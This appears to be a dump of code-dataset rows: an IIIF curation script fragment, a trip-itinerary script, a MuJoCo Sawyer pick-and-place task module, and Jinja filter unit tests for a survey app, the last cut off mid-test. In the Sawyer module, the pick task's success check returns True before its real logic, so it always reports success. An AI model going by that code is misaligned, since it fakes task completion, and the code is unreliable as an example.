"selections": [
{
"@id": curation_uri + "/range1",
"@type": "sc:Range",
"label": "Automatic curation by IIIF Converter",
"members": members,
"within": {
"@id": df["@id"],
"@type": "sc:Manifest",
"label": label
}
}
]
}
json.dump(curation_data, fw, ensure_ascii=False, indent=4, sort_keys=True, separators=(',', ': '))
| en | 0.766672 | # time.sleep(0.5) | 2.621495 | 3 |
programme.py | GaLaXy102/Vacationing | 0 | 8034 | <reponame>GaLaXy102/Vacationing
from lib import get_itineraries
import data
if __name__ == '__main__':
for itinerary in get_itineraries(data.sicily):
print("#" * 24)
print(itinerary)
print("")
| from lib import get_itineraries
import data
if __name__ == '__main__':
for itinerary in get_itineraries(data.sicily):
print("#" * 24)
print(itinerary)
print("") | none | 1 | 2.049516 | 2 |
|
sawyer/mujoco/tasks/transition_pick_and_place_task.py | rlagywjd802/gym-sawyer | 0 | 8035 | import numpy as np
from sawyer.mujoco.tasks.base import ComposableTask
class TransitionTask(ComposableTask):
"""
Task to pick up an object with the robot gripper.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self):
pass
def compute_reward(self, obs, info):
return 0
def is_success(self, obs, info=None, init=None):
raise NotImplementedError
def is_terminate(self, obs, init):
return self.is_success(obs, init=init)
def is_fail(self, obs):
raise NotImplementedError
def reset(self):
pass
@property
def completion_bonus(self):
return self._completion_bonus
class TransitionPickTask(TransitionTask):
"""
Task to pick up an object with the robot gripper.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self,
success_thresh=0.05,
object_lift_target=0.3,
completion_bonus=0):
self._success_thresh = success_thresh
self._obj_lift_target = object_lift_target
self._completion_bonus = completion_bonus
self._t = 0
def is_success(self, obs, info=None, init=None):
return True
if init:
self.reset()
goal = obs[11:14] + np.array([0, 0, 0.04])
box_pos = obs[4:7]
d = np.linalg.norm(box_pos - goal, axis=-1)
print("****[pick/is success] box_pos:{}, goal:{}, d:{}".format(box_pos, goal, d))
return d < self._success_thresh
def is_fail(self, obs):
self._t += 1
if self._t >= 1 and not self.is_success(obs):
return True
return False
def reset(self):
self._t = 0
class TransitionPlaceTask(TransitionTask):
"""
Task to place object at a desired location.
"""
def __init__(self,
success_thresh=0.015,
completion_bonus=0):
self._success_thresh = success_thresh
self._completion_bonus = completion_bonus
self._prev_box_pos = None
def is_success(self, obs, info=None, init=None):
if init:
self.reset()
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.03
abs_diff = abs(box_pos - goal)
print("****[place/is success] abs_diff:{}".format(abs_diff))
return ( abs_diff[0] < max_xy_diff and
abs_diff[1] < max_xy_diff and
box_pos[2] < 0.21 )
def is_fail(self, obs):
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.03
abs_diff = abs(box_pos - goal)
if self._prev_box_pos is None:
self._prev_box_pos = box_pos
else:
max_z_diff = 0.009
z_diff = self._prev_box_pos[2] - box_pos[2]
print("****[place/is_fail] z_diff:{}, box_pos_z:{}".format(z_diff, box_pos[2]))
print(self._prev_box_pos[2], box_pos[2])
if abs_diff[0] > max_xy_diff or abs_diff[1] > max_xy_diff or z_diff < max_z_diff:
return True
else:
self._prev_box_pos = box_pos
return False
def reset(self):
self._prev_box_pos = None
class TransitionPickAndPlaceTask(TransitionTask):
"""
Task to pick up an object and place the object at a desired location.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self,
success_thresh=0.01,
completion_bonus=0):
self._success_thresh = success_thresh
self._completion_bonus = completion_bonus
self._prev_box_pos = None
self._picked = False
self._placing = False
def is_success(self, obs, info=None, init=None):
if init:
self.reset()
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.02
abs_diff = abs(box_pos - goal)
print("****[pick&place/is success] abs_diff:{}, box_z:{}".format(abs_diff, box_pos[2]))
return ( abs_diff[0] < max_xy_diff and
abs_diff[1] < max_xy_diff and
box_pos[2] < 0.22 )
def is_fail(self, obs):
box_pos = obs[4:7]
goal = obs[11:14]
abs_diff = abs(box_pos - goal)
max_xy_diff = 0.03
if self._picked:
self._placing = True
print("placing True")
else:
print("placing False")
if self._picked and not self._placing:
print("return True")
return True
self._picked = True
if self._placing:
if self._prev_box_pos is None:
self._prev_box_pos = box_pos
else:
max_z_diff = 0.009
z_diff = self._prev_box_pos[2] - box_pos[2]
print("****[pick&place/is_fail] z_diff:{}, box_pos_z:{}".format(z_diff, box_pos[2]))
print(self._prev_box_pos[2], box_pos[2])
if box_pos[2] < 0.24 and (abs_diff[0] > max_xy_diff or abs_diff[1] > max_xy_diff or z_diff < max_z_diff):
print("return True")
return True
else:
self._prev_box_pos = box_pos
return False
def get_next_primitive(self, obs, prev_primitive):
if prev_primitive == -1:
return 'pick'
return 'place'
def reset(self):
self._picked = False
self._placing = False
self._prev_box_pos = None
| import numpy as np
from sawyer.mujoco.tasks.base import ComposableTask
class TransitionTask(ComposableTask):
"""
Task to pick up an object with the robot gripper.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self):
pass
def compute_reward(self, obs, info):
return 0
def is_success(self, obs, info=None, init=None):
raise NotImplementedError
def is_terminate(self, obs, init):
return self.is_success(obs, init=init)
def is_fail(self, obs):
raise NotImplementedError
def reset(self):
pass
@property
def completion_bonus(self):
return self._completion_bonus
class TransitionPickTask(TransitionTask):
"""
Task to pick up an object with the robot gripper.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self,
success_thresh=0.05,
object_lift_target=0.3,
completion_bonus=0):
self._success_thresh = success_thresh
self._obj_lift_target = object_lift_target
self._completion_bonus = completion_bonus
self._t = 0
def is_success(self, obs, info=None, init=None):
return True
if init:
self.reset()
goal = obs[11:14] + np.array([0, 0, 0.04])
box_pos = obs[4:7]
d = np.linalg.norm(box_pos - goal, axis=-1)
print("****[pick/is success] box_pos:{}, goal:{}, d:{}".format(box_pos, goal, d))
return d < self._success_thresh
def is_fail(self, obs):
self._t += 1
if self._t >= 1 and not self.is_success(obs):
return True
return False
def reset(self):
self._t = 0
class TransitionPlaceTask(TransitionTask):
"""
Task to place object at a desired location.
"""
def __init__(self,
success_thresh=0.015,
completion_bonus=0):
self._success_thresh = success_thresh
self._completion_bonus = completion_bonus
self._prev_box_pos = None
def is_success(self, obs, info=None, init=None):
if init:
self.reset()
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.03
abs_diff = abs(box_pos - goal)
print("****[place/is success] abs_diff:{}".format(abs_diff))
return ( abs_diff[0] < max_xy_diff and
abs_diff[1] < max_xy_diff and
box_pos[2] < 0.21 )
def is_fail(self, obs):
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.03
abs_diff = abs(box_pos - goal)
if self._prev_box_pos is None:
self._prev_box_pos = box_pos
else:
max_z_diff = 0.009
z_diff = self._prev_box_pos[2] - box_pos[2]
print("****[place/is_fail] z_diff:{}, box_pos_z:{}".format(z_diff, box_pos[2]))
print(self._prev_box_pos[2], box_pos[2])
if abs_diff[0] > max_xy_diff or abs_diff[1] > max_xy_diff or z_diff < max_z_diff:
return True
else:
self._prev_box_pos = box_pos
return False
def reset(self):
self._prev_box_pos = None
class TransitionPickAndPlaceTask(TransitionTask):
"""
Task to pick up an object and place the object at a desired location.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self,
success_thresh=0.01,
completion_bonus=0):
self._success_thresh = success_thresh
self._completion_bonus = completion_bonus
self._prev_box_pos = None
self._picked = False
self._placing = False
def is_success(self, obs, info=None, init=None):
if init:
self.reset()
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.02
abs_diff = abs(box_pos - goal)
print("****[pick&place/is success] abs_diff:{}, box_z:{}".format(abs_diff, box_pos[2]))
return ( abs_diff[0] < max_xy_diff and
abs_diff[1] < max_xy_diff and
box_pos[2] < 0.22 )
def is_fail(self, obs):
box_pos = obs[4:7]
goal = obs[11:14]
abs_diff = abs(box_pos - goal)
max_xy_diff = 0.03
if self._picked:
self._placing = True
print("placing True")
else:
print("placing False")
if self._picked and not self._placing:
print("return True")
return True
self._picked = True
if self._placing:
if self._prev_box_pos is None:
self._prev_box_pos = box_pos
else:
max_z_diff = 0.009
z_diff = self._prev_box_pos[2] - box_pos[2]
print("****[pick&place/is_fail] z_diff:{}, box_pos_z:{}".format(z_diff, box_pos[2]))
print(self._prev_box_pos[2], box_pos[2])
if box_pos[2] < 0.24 and (abs_diff[0] > max_xy_diff or abs_diff[1] > max_xy_diff or z_diff < max_z_diff):
print("return True")
return True
else:
self._prev_box_pos = box_pos
return False
def get_next_primitive(self, obs, prev_primitive):
if prev_primitive == -1:
return 'pick'
return 'place'
def reset(self):
self._picked = False
self._placing = False
self._prev_box_pos = None
| en | 0.949899 | Task to pick up an object with the robot gripper. Success condition: - Object is grasped and has been lifted above the table Task to pick up an object with the robot gripper. Success condition: - Object is grasped and has been lifted above the table Task to place object at a desired location. Task to pick up an object and place the object at a desired location. Success condition: - Object is grasped and has been lifted above the table | 2.570647 | 3 |
tests/app/test_jinja_filters.py | nealedj/eq-survey-runner | 0 | 8036 | <reponame>nealedj/eq-survey-runner
# coding: utf-8
from types import SimpleNamespace
from datetime import datetime, timedelta
from unittest.mock import patch
from dateutil.relativedelta import relativedelta
from jinja2 import Undefined, Markup
from mock import Mock
from app.jinja_filters import (
format_date, format_conditional_date, format_currency, get_currency_symbol,
format_multilined_string, format_percentage, format_date_range,
format_household_member_name, format_datetime,
format_number_to_alphabetic_letter, format_unit, format_currency_for_input,
format_number, format_unordered_list, format_unit_input_label,
format_household_member_name_possessive, concatenated_list,
calculate_years_difference, get_current_date, as_london_tz, max_value,
min_value, get_question_title, get_answer_label,
format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom,
format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list)
from tests.app.app_context_test_case import AppContextTestCase
class TestJinjaFilters(AppContextTestCase): # pylint: disable=too-many-public-methods
def setUp(self):
self.autoescape_context = Mock(autoescape=True)
super(TestJinjaFilters, self).setUp()
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_currency_for_input(self):
self.assertEqual(format_currency_for_input('100', 2), '100.00')
self.assertEqual(format_currency_for_input('100.0', 2), '100.00')
self.assertEqual(format_currency_for_input('100.00', 2), '100.00')
self.assertEqual(format_currency_for_input('1000'), '1,000')
self.assertEqual(format_currency_for_input('10000'), '10,000')
self.assertEqual(format_currency_for_input('100000000'), '100,000,000')
self.assertEqual(format_currency_for_input('100000000', 2), '100,000,000.00')
self.assertEqual(format_currency_for_input(0, 2), '0.00')
self.assertEqual(format_currency_for_input(0), '0')
self.assertEqual(format_currency_for_input(''), '')
self.assertEqual(format_currency_for_input(None), '')
self.assertEqual(format_currency_for_input(Undefined()), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_get_currency_symbol(self):
self.assertEqual(get_currency_symbol('GBP'), '£')
self.assertEqual(get_currency_symbol('EUR'), '€')
self.assertEqual(get_currency_symbol('USD'), 'US$')
self.assertEqual(get_currency_symbol('JPY'), 'JP¥')
self.assertEqual(get_currency_symbol(''), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_currency(self):
self.assertEqual(format_currency(self.autoescape_context, '11', 'GBP'), "<span class='date'>£11.00</span>")
self.assertEqual(format_currency(self.autoescape_context, '11.99', 'GBP'), "<span class='date'>£11.99</span>")
self.assertEqual(format_currency(self.autoescape_context, '11000', 'USD'), "<span class='date'>US$11,000.00</span>")
self.assertEqual(format_currency(self.autoescape_context, 0), "<span class='date'>£0.00</span>")
self.assertEqual(format_currency(self.autoescape_context, 0.00), "<span class='date'>£0.00</span>")
self.assertEqual(format_currency(self.autoescape_context, '', ), "<span class='date'></span>")
self.assertEqual(format_currency(self.autoescape_context, None), "<span class='date'></span>")
self.assertEqual(format_currency(self.autoescape_context, Undefined()), "<span class='date'></span>")
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_number(self):
self.assertEqual(format_number(123), '123')
self.assertEqual(format_number('123.4'), '123.4')
self.assertEqual(format_number('123.40'), '123.4')
self.assertEqual(format_number('1000'), '1,000')
self.assertEqual(format_number('10000'), '10,000')
self.assertEqual(format_number('100000000'), '100,000,000')
self.assertEqual(format_number(0), '0')
self.assertEqual(format_number(0.00), '0')
self.assertEqual(format_number(''), '')
self.assertEqual(format_number(None), '')
self.assertEqual(format_number(Undefined()), '')
def test_format_multilined_string_matches_carriage_return(self):
# Given
new_line = 'this is on a new\rline'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string_matches_new_line(self):
# Given
new_line = 'this is on a new\nline'
# When
format_value = format_multilined_string(self.autoescape_context,
new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string_matches_carriage_return_new_line(self):
# Given
new_line = 'this is on a new\r\nline'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string(self):
# Given
new_line = 'this is\ron a\nnew\r\nline'
# When
format_value = format_multilined_string(self.autoescape_context,
new_line)
self.assertEqual(format_value, 'this is<br>on a<br>new<br>line')
def test_format_multilined_string_auto_escape(self):
# Given
new_line = '<'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(str(format_value), '<')
def test_get_current_date(self):
# Given
date_format = '%-d %B %Y'
# When
format_value = get_current_date(self.autoescape_context)
current_date = as_london_tz(datetime.utcnow()).strftime(date_format)
# Then
self.assertEqual(format_value, "<span class='date'>{date}</span>".format(date=current_date))
def test_format_date(self):
# Given
date = '2017-01-01'
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span>")
def test_format_date_month_year(self):
# Given
date = '2017-01'
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>January 2017</span>")
def test_format_date_markup(self):
# Given
date = [Markup('2017-01')]
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>January 2017</span>")
def test_format_date_non_string(self):
# Given
date = 123
# When
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, 123)
def test_format_date_none(self):
# Given
date = None
# When
format_value = format_date(self.autoescape_context, date)
# Then
self.assertIsNone(format_value)
def test_format_date_time_in_bst(self):
# Given
date_time = '2018-03-29T11:59:13.528680'
# When
with self.app_request_context('/'):
format_value = format_datetime(self.autoescape_context, date_time)
# Then
self.assertEqual(format_value, "<span class='date'>29 March 2018 at 12:59</span>")
def test_format_date_time_in_gmt(self):
# Given
date_time = '2018-10-28T11:59:13.528680'
# When
with self.app_request_context('/'):
format_value = format_datetime(self.autoescape_context, date_time)
# Then
self.assertEqual(format_value, "<span class='date'>28 October 2018 at 11:59</span>")
def test_format_conditional_date_not_date(self):
# Given no test for integers this check was removed from jinja_filters
invalid_input = [('1', None),
('1-1-1', None)]
# When
for nonsense in invalid_input:
date1 = nonsense[0]
date2 = nonsense[1]
with self.assertRaises(Exception) as exception:
format_conditional_date(self.autoescape_context, date1, date2)
# Then
self.assertIn("does not match format '%Y-%m'", str(exception.exception))
def test_format_conditional_date_not_set(self):
# Given
# When
with self.assertRaises(Exception) as exception:
format_conditional_date(self.autoescape_context, None, None)
# Then
self.assertIn('No valid dates passed to format_conditional_dates filter', str(exception.exception))
def test_format_conditional_date(self):
# Given
datelist = [('2016-01-12', '2016-02-12', '12 January 2016'),
('2017-12-23', None, '23 December 2017'),
(None, '2017-12-24', '24 December 2017')]
# When
with self.app_request_context('/'):
for triple in datelist:
date1 = triple[0]
date2 = triple[1]
format_value = format_conditional_date(self.autoescape_context, date1, date2)
# Then
self.assertEqual(format_value, "<span class='date'>{date}</span>".format(date=triple[2]))
def test_calculate_years_difference(self):
with patch('app.setup.get_session_store', return_value=None):
# Given
ten_years_ago = (datetime.today()+relativedelta(years=-10)).strftime('%Y-%m-%d')
date_list = [('2017-01-30', '2018-01-30', '1 year'),
('2015-02-02', '2018-02-01', '2 years'),
('2016-02-29', '2017-02-28', '1 year'),
('2016-02-29', '2020-02-28', '3 years'),
(ten_years_ago, 'now', '10 years')]
for dates in date_list:
start_date = dates[0]
end_date = dates[1]
# When
calculated_value = calculate_years_difference(start_date, end_date)
# Then
self.assertEqual(calculated_value, dates[2])
def test_calculate_years_difference_none(self):
# Given
with self.assertRaises(Exception) as e:
# When
calculate_years_difference(None, '2017-01-17')
# Then
self.assertEqual('Valid date(s) not passed to calculate_years_difference filter', str(e.exception))
def test_format_date_range(self):
# Given
start_date = '2017-01-01'
end_date = '2017-01-31'
# When
with self.app_request_context('/'):
format_value = format_date_range(self.autoescape_context, start_date, end_date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span> to <span class='date'>31 January 2017</span>")
def test_format_date_range_missing_end_date(self):
# Given
start_date = '2017-01-01'
# When
with self.app_request_context('/'):
format_value = format_date_range(self.autoescape_context, start_date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span>")
def test_format_household_member_name(self):
# Given
name = ['John', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_no_surname(self):
# Given
name = ['John', '']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John')
def test_format_household_member_name_surname_is_none(self):
# Given
name = ['John', None]
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John')
def test_format_household_member_name_no_first_name(self):
# Given
name = ['', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'Doe')
def test_format_household_member_name_first_name_is_none(self):
# Given
name = [None, 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'Doe')
def test_format_household_member_name_first_middle_and_last(self):
# Given
name = ['John', 'J', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_no_middle_name(self):
# Given
name = ['John', '', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_middle_name_is_none(self):
# Given
name = ['John', None, 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_trim_spaces(self):
# Given
name = ['John ', ' Doe ']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_possessive(self):
# Given
name = ['John', 'Doe']
# When
format_value = format_household_member_name_possessive(name)
self.assertEqual(format_value, '<NAME>\u2019s')
def test_format_household_member_name_possessive_with_no_names(self):
# Given
name = [Undefined(), Undefined()]
# When
format_value = format_household_member_name_possessive(name)
self.assertIsNone(format_value)
def test_format_household_member_name_possessive_trailing_s(self):
# Given
name = ['John', 'Does']
# When
format_value = format_household_member_name_possessive(name)
self.assertEqual(format_value, '<NAME>\u2019')
def test_concatenated_list(self):
# Given
list_items = ['1 The ONS', 'Newport', 'NP108XG']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, '1 The ONS, Newport, NP108XG')
def test_concatenated_list_one_entry(self):
# Given
list_items = ['One entry']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, 'One entry')
def test_concatenated_list_trim_white_spaces_and_trailing_commas(self):
# Given
list_items = ['', '1 The ONS ', 'Newport ', ' NP108XG', '']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, '1 The ONS, Newport, NP108XG')
def test_format_percentage(self):
self.assertEqual(format_percentage('100'), '100%')
self.assertEqual(format_percentage(100), '100%')
self.assertEqual(format_percentage(4.5), '4.5%')
def test_format_number_to_alphabetic_letter(self):
self.assertEqual(format_number_to_alphabetic_letter(0), 'a')
self.assertEqual(format_number_to_alphabetic_letter(4), 'e')
self.assertEqual(format_number_to_alphabetic_letter(25), 'z')
self.assertEqual(format_number_to_alphabetic_letter(-1), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_unit(self):
self.assertEqual(format_unit('length-meter', 100), '100 m')
self.assertEqual(format_unit('length-centimeter', 100), '100 cm')
self.assertEqual(format_unit('length-mile', 100), '100 mi')
self.assertEqual(format_unit('length-kilometer', 100), '100 km')
self.assertEqual(format_unit('area-square-meter', 100), '100 m²')
self.assertEqual(format_unit('area-square-centimeter', 100), '100 cm²')
self.assertEqual(format_unit('area-square-kilometer', 100), '100 km²')
self.assertEqual(format_unit('area-square-mile', 100), '100 sq mi')
self.assertEqual(format_unit('area-hectare', 100), '100 ha')
self.assertEqual(format_unit('area-acre', 100), '100 ac')
self.assertEqual(format_unit('volume-cubic-meter', 100), '100 m³')
self.assertEqual(format_unit('volume-cubic-centimeter', 100), '100 cm³')
self.assertEqual(format_unit('volume-liter', 100), '100 l')
self.assertEqual(format_unit('volume-hectoliter', 100), '100 hl')
self.assertEqual(format_unit('volume-megaliter', 100), '100 Ml')
self.assertEqual(format_unit('duration-hour', 100), '100 hrs')
self.assertEqual(format_unit('duration-hour', 100, 'long'), '100 hours')
self.assertEqual(format_unit('duration-year', 100, 'long'), '100 years')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='cy'))
def test_format_unit_welsh(self):
self.assertEqual(format_unit('duration-hour', 100), '100 awr')
self.assertEqual(format_unit('duration-year', 100), '100 bl')
self.assertEqual(format_unit('duration-hour', 100, 'long'), '100 awr')
self.assertEqual(format_unit('duration-year', 100, 'long'), '100 mlynedd')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_unit_input_label(self):
self.assertEqual(format_unit_input_label('length-meter'), 'm')
self.assertEqual(format_unit_input_label('length-centimeter'), 'cm')
self.assertEqual(format_unit_input_label('length-mile'), 'mi')
self.assertEqual(format_unit_input_label('length-kilometer'), 'km')
self.assertEqual(format_unit_input_label('area-square-meter'), 'm²')
self.assertEqual(format_unit_input_label('area-square-centimeter'), 'cm²')
self.assertEqual(format_unit_input_label('area-square-kilometer'), 'km²')
self.assertEqual(format_unit_input_label('area-square-mile'), 'sq mi')
self.assertEqual(format_unit_input_label('area-hectare'), 'ha')
self.assertEqual(format_unit_input_label('area-acre'), 'ac')
self.assertEqual(format_unit_input_label('volume-cubic-meter'), 'm³')
self.assertEqual(format_unit_input_label('volume-cubic-centimeter'), 'cm³')
self.assertEqual(format_unit_input_label('volume-liter'), 'l')
self.assertEqual(format_unit_input_label('volume-hectoliter'), 'hl')
self.assertEqual(format_unit_input_label('volume-megaliter'), 'Ml')
self.assertEqual(format_unit_input_label('duration-hour'), 'hr')
self.assertEqual(format_unit_input_label('duration-hour', 'long'), 'hours')
self.assertEqual(format_unit_input_label('duration-year'), 'yr')
self.assertEqual(format_unit_input_label('duration-year', 'long'), 'years')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='cy'))
def test_format_unit_input_label_welsh(self):
self.assertEqual(format_unit_input_label('duration-hour'), 'awr')
self.assertEqual(format_unit_input_label('duration-hour', 'long'), 'awr')
self.assertEqual(format_unit_input_label('duration-year'), 'bl')
self.assertEqual(format_unit_input_label('duration-year', 'long'), 'flynedd')
def test_format_year_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5, 'months': 4}), '5 years 4 months')
self.assertEqual(format_duration({'years': 5, 'months': 0}), '5 years')
self.assertEqual(format_duration({'years': 0, 'months': 4}), '4 months')
self.assertEqual(format_duration({'years': 1, 'months': 1}), '1 year 1 month')
self.assertEqual(format_duration({'years': 0, 'months': 0}), '0 months')
def test_format_year_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5}), '5 years')
self.assertEqual(format_duration({'years': 1}), '1 year')
self.assertEqual(format_duration({'years': 0}), '0 years')
def test_format_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'months': 5}), '5 months')
self.assertEqual(format_duration({'months': 1}), '1 month')
self.assertEqual(format_duration({'months': 0}), '0 months')
def test_format_unordered_list(self):
list_items = [['item 1', 'item 2']]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
expected_value = '<ul><li>item 1</li><li>item 2</li></ul>'
self.assertEqual(expected_value, formatted_value)
def test_format_unordered_list_with_no_input(self):
list_items = []
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_format_unordered_list_with_empty_list(self):
list_items = [[]]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_max_value(self):
# Given
two_ints = (1, 2)
# When
max_of_two = max_value(*two_ints)
# Then
self.assertEqual(max_of_two, 2)
def test_max_value_none(self):
# Given
one_int = (1, None)
# When
max_of_two = max_value(*one_int)
# Then
self.assertEqual(max_of_two, 1)
def test_max_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_max_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_max_values_compatible(self):
# Given
args = (-1, True)
# When
max_of_two = max_value(*args)
# Then
self.assertEqual(max_of_two, True)
def test_max_value_str(self):
# Given
two_str = ('a', 'abc')
# When
max_of_two = max_value(*two_str)
# Then
self.assertEqual(max_of_two, 'abc')
def test_max_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
max_of_two = max_value(*two_dates)
# Then
self.assertEqual(max_of_two, now)
def test_min_value(self):
# Given
two_ints = (1, 2)
# When
min_of_two = min_value(*two_ints)
# Then
self.assertEqual(min_of_two, 1)
def test_min_value_none(self):
# Given
one_int = (1, None)
# When
min_of_two = min_value(*one_int)
# Then
self.assertEqual(min_of_two, 1)
def test_min_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_min_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_min_values_compatible(self):
# Given
args = (-1, True)
# When
min_of_two = min_value(*args)
# Then
self.assertEqual(min_of_two, -1)
def test_min_value_str(self):
# Given
two_str = ('a', 'abc')
# When
min_of_two = min_value(*two_str)
# Then
self.assertEqual(min_of_two, 'a')
def test_min_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
min_of_two = min_value(*two_dates)
# Then
self.assertEqual(min_of_two, then)
def test_get_question_title_with_title_value(self):
# Given
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'title': 'question_title'
}
}
)
# When
title = get_question_title(context, question_id)
# Then
self.assertEqual(title, 'question_title')
def test_get_question_title_with_question_titles(self):
# Given
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question'
},
'content': {
'question_titles': {
'question': 'default_question_title'
}
}
}
)
# When
title = get_question_title(context, question_id)
# Then
self.assertEqual(title, 'default_question_title')
def test_get_answer_label_with_answer_label(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'answers': [{
'id': 'answer',
'label': 'answer_label'
}]
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'answer_label')
def test_get_answer_label_with_no_answer_label_and_title(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'title': 'question_title',
'answers': [{
'id': 'answer'
}]
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'question_title')
def test_get_answer_label_with_no_answer_label_and_question_titles(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'answers': [{
'id': 'answer'
}]
},
'content': {
'question_titles': {
'question': 'default_question_title'
}
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'default_question_title')
def test_offset_date_from_day(self):
test_cases = [
# (Input Date, offset, day of week, expected output)
('2018-08-10', {}, 'SU', '2018-08-05'), # Friday outputs previous Sunday
('2018-08-05', {}, 'SU', '2018-07-29'), # Sunday outputs previous Sunday (Must be a full Sunday)
('2018-08-06', {}, 'SU', '2018-08-05'), # Monday outputs previous Sunday
('2018-08-06', {'days': -1}, 'SU', '2018-08-04'), # Previous sunday with -1 day offset
('2018-08-05', {'weeks': 1}, 'SU', '2018-08-05'), # Previous sunday with +1 month offset, back to input
('2018-08-10', {}, 'FR', '2018-08-03'), # Friday outputs previous Friday
('2018-08-10T13:32:20.365665', {}, 'FR', '2018-08-03'), # Ensure we can handle datetime input
('2018-08-10', {'weeks': 4}, 'FR', '2018-08-31'), # Friday outputs previous Friday + 4 weeks
('2018-08-10', {'bad_period': 4}, 'FR', '2018-08-03'), # Friday outputs previous Friday + nothing
('2018-08-10', {'years': 1}, 'FR', '2019-08-03'), # Friday outputs previous Friday + 1 year
('2018-08-10', {'years': 1, 'weeks': 1, 'days': 1}, 'FR', '2019-08-11'), # Friday outputs previous Friday + 1 year + 1 week + 1 day
]
for case in test_cases:
